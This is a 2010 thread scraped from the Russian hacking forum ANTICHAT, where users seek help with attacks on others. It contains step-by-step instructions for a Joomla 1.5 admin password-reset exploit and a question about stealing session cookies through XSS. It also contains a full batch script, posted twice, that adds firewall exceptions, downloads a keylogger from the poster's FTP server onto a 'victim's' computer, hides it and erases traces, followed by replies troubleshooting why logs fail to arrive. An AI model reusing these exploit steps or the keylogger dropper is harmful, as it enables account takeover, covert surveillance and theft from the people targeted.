ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

11.12.2010, 19:44
|
|
Guest
Сообщений: n/a
Провел на форуме: 23579
Репутация:
-5
|
|
так в этом и проблема....кавычки. не если нет прав ладно. спасибо!
|
|
|
|

12.12.2010, 05:13
|
|
Новичок
Регистрация: 13.05.2010
Сообщений: 0
Провел на форуме: 1205
Репутация:
0
|
|
joomla 1.5 exploit
1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confir m
2. Write into field "token" char ' and Click OK.
3. Write new password for admin
4. Go to url : target.com/administrator/
5. Login admin with new password
во время входа мне выдает ошибку неверный логин ???
|
|
|

12.12.2010, 05:17
|
|
Guest
Сообщений: n/a
Провел на форуме: 8054
Репутация:
0
|
|
Нашел xss, выполняю:
Сообщение от None
alert(document.cookie)
В алетре только половина кукав... И этого не достаточно что бы украсть сессию. В чем может быть проблема?
|
|
|
|

12.12.2010, 11:13
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме: 2459557
Репутация:
606
|
|
Сообщение от Mirrey
Mirrey said:
Нашел xss, выполняю:
В алетре только половина кукав... И этого не достаточно что бы украсть сессию. В чем может быть проблема?
Наверное, некоторые куки недоступны для javascriptа, то есть они с флагом HTTP-Only
|
|
|

12.12.2010, 11:26
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 18
Провел на форуме: 278340
Репутация:
0
|
|
Сообщение от wizzardl
wizzardl said:
joomla 1.5 exploit
1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confir m
2. Write into field "token" char ' and Click OK.
3. Write new password for admin
4. Go to url : target.com/administrator/
5. Login admin with new password
во время входа мне выдает ошибку неверный логин ???
Значит уязвимость исправлена.
|
|
|

12.12.2010, 16:19
|
|
Guest
Сообщений: n/a
Провел на форуме: 1838
Репутация:
0
|
|
Столкнулся с такой проблемой. Создал батник install.bat
Код:
Code:
MKDIR C:\hc
netsh firewall add allowedprogram C:\install.bat "DownloaderFTP" enable
echo download >key.txt
echo download >>key.txt
echo get inst_jasp.exe C:\hc\inst_jasp.exe >>key.txt
echo bye >>key.txt
ftp -s:C:\key.txt "ИП АДРЕС ФТП"
netsh firewall add allowedprogram C:\hc\inst_jasp.exe "Blaze" enable
attrib "C:\hc" +h
start C:\hc\inst_jasp.exe
del key.txt
del install.bat
Батник закачивает на комп жертвы кейлоггер с моего фтп. Если я запускаю у себя, то все норм, логи идут. А если на удаленном компе через cmd, то никаких логов нет =(
Проверил, файл на комп закачивает и вроде выполняет. Но, почему-то логов нет.
|
|
|
|

12.12.2010, 16:31
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
Сообщение от Darklamar
Darklamar said:
Столкнулся с такой проблемой. Создал батник install.bat
Код:
Code:
MKDIR C:\hc
netsh firewall add allowedprogram C:\install.bat "DownloaderFTP" enable
echo download >key.txt
echo download >>key.txt
echo get inst_jasp.exe C:\hc\inst_jasp.exe >>key.txt
echo bye >>key.txt
ftp -s:C:\key.txt "ИП АДРЕС ФТП"
netsh firewall add allowedprogram C:\hc\inst_jasp.exe "Blaze" enable
attrib "C:\hc" +h
start C:\hc\inst_jasp.exe
del key.txt
del install.bat
Батник закачивает на комп жертвы кейлоггер с моего фтп. Если я запускаю у себя, то все норм, логи идут. А если на удаленном компе через cmd, то никаких логов нет =(
Проверил, файл на комп закачивает и вроде выполняет. Но, почему-то логов нет.
ANTIVIRUS+FIREWALL
|
|
|

12.12.2010, 16:34
|
|
Guest
Сообщений: n/a
Провел на форуме: 1838
Репутация:
0
|
|
Антивира у него нету, фаерволла тоже (кроме стандартного, но в батнике просаны исключения)
|
|
|
|

12.12.2010, 19:03
|
|
Новичок
Регистрация: 30.01.2010
Сообщений: 0
Провел на форуме: 14728
Репутация:
0
|
|
Подскажите пожалуйста как создать shell и как им пользоватся
|
|
|

12.12.2010, 19:07
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
Сообщение от MikePro
MikePro said:
Подскажите пожалуйста как создать shell и как им пользоватся
ну дорогой задал ты вопрос, шелл что бы создать надо в пхп или в другом веб языке шарить, но я подозреваю что тебя интересует как залить шелл (аплоад на сервер)..для этого прочитай -ка сначала все маны по багам на ачате, но остановись на скулях поболее.и через пару эдак месяцев если понятливый будешь , то узнаешь что такое шелл и с чем его едят..а пока кури маны..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|